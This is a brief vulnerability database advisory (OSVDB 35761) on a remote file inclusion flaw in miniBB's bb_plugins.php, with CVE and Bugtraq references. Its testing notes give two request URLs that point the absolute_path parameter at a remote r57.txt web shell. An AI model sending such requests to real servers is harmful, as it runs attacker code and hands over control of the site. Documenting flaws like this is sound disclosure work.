miniBB bb_plugins.php absolute_path Variable Remote File Inclusion

2007-04-11T20:49:28
ID OSVDB:35761
Type osvdb
Reporter OSVDB
Modified 2007-04-11T20:49:28

Description

Manual Testing Notes

/components/minibb/bb_plugins.php?absolute_path=http://[target]/r57.txt? /components/com_minibb/bb_plugins.php?absolute_path=http://[target]/r57.txt?

References:

Related OSVDB ID: 35762 Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001518.html ISS X-Force ID: 33578 Generic Exploit URL: http://www.milw0rm.com/exploits/3707 FrSIRT Advisory: ADV-2007-1354 CVE-2007-2317 Bugtraq ID: 23416